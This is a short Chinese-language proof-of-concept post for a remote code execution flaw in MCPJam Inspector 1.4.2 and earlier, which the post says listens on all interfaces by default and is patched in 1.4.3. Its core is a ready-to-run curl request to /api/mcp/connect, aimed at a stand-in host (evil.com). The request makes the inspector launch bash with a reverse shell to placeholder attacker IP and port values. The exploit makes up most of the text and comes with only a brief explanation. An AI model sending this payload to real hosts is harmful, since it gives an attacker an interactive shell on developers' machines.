关于MCP Server漏洞的PoC。
自动生成带有正确正文的帖子部分。
/api/mcp/connect
curl http://evil.com:6274/api/mcp/connect --header "Content-Type: application/json" --data '{"serverConfig":{"command":"bash","args":["-c","bash -i >& /dev/tcp/TUIP/TUPUERTO 0>&1"],"env":{}},"serverId":"pruebaxd"}'
MCPJam Inspector是第一个用于MCP服务器的本地开发平台。1.4.2及更早版本存在远程代码执行(RCE)漏洞,攻击者可发送特制HTTP请求触发MCP服务器安装,导致RCE。由于MCPJam Inspector默认监听0.0.0.0而非127.0.0.1,攻击者可以通过简单的HTTP请求远程触发RCE。1.4.3版本包含补丁。